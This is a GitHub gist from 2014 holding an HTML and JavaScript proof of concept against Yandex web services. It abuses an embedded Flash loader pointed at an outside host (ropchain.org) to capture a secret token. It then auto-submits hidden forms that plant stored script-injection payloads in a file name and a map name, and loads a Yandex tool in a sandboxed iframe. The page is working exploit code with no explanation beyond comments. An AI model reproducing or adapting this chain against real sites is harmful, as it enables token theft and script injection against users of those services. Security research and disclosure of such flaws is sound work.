Created
May 22, 2014 09:47
-
-
Save ZoczuS/9f258fb97f626a175621 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html><body> | |
| <script> | |
| console.log=function(a){ | |
| var x = document.getElementById("content"); | |
| if(a == "Start") { | |
| // start ;-) | |
| } | |
| else { | |
| var pos = a.search("secret-key"); | |
| var token = a.substring(pos+13, pos+13+33); | |
| alert("The secret token is: " + token); | |
| //XSS 1 | |
| var f1 = document.getElementById("f1"); | |
| f1.action = "http://interactive-answers.webmaster.yandex.com/gate/add-scheme/get?crc="+ token +"&filename=f%3Cscript%3Ealert(document.location)%3C%2Fscript%3E.png"; | |
| f1.submit(); | |
| var f2 = document.getElementById("f2"); | |
| document.getElementById("crc").value=token; | |
| f2.submit(); | |
| sub(); | |
| } | |
| } | |
| function sub(){ | |
| var tmp = document.createElement("iframe"); | |
| tmp.src = "http://api.yandex.ru/maps/tools/constructor/"; | |
| tmp.sandbox = "allow-scripts allow-same-origin allow-forms"; | |
| document.getElementById("ble").appendChild(tmp); | |
| } | |
| </script> | |
| <br><center> | |
| <object data="http://kraski-static.yandex.net/kraski-universal-blogplayer-loader.swf?baseUrl=http://kraski.yandex.ru&servantUrl=http://ropchain.org/poc/yandex&uploadUrl=http://ropchain.org/poc/yandex/&cardHash=flower017.jpg.2" width="500" height="600" allowscriptaccess="always"> | |
| </object> | |
| </center> | |
| <form id="f1" target="xss1" action="" method="POST" enctype="multipart/formdata"></form> | |
| <form id="f2" target="xss2" action="http://api.yandex.ru/maps/tools/constructor/proxy.xml" method="POST"> | |
| <input id="crc" type="hidden" name="key" value=""> | |
| <input type="hidden" name="v" value="1.0"> | |
| <input type="hidden" name="action" value="create"> | |
| <input type="hidden" name="map" value='{"name":"f<script>alert(document.location);</script>","sid":"","size":[600,450],"lang":"ru-RU","boundedBy":[[16.70123,52.32187],[17.11321,52.5108]],"type":"MAP","geoObjects":[{"style":"twirl#lightblueDotIcon","geometry":{"type":"Point","coordinates":[16.93827,52.40947]},"name":"ĂÂĂžĂ¡Ă½Ă°Ă½ĂÂ,+ĂÂĂÂľĂÂťheheøĂºÞĂ¿ÞĂÂťĂÂĂÂĂºÞĂÂľ+Ă²ĂžĂÂľĂ²ĂžĂ´ĂÂĂÂĂ²Ăž,+ĂÂĂžĂÂťĂÂĂÂĂ°"}],"styles":{},"center":[16.90722,52.41644],"zoom":11}'> | |
| </form> | |
| <iframe name="xss1" width="0" height="0"></iframe> | |
| <iframe name="xss2" width="0" height="0"></iframe> | |
| <div id="ble"></div> | |
| </body></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment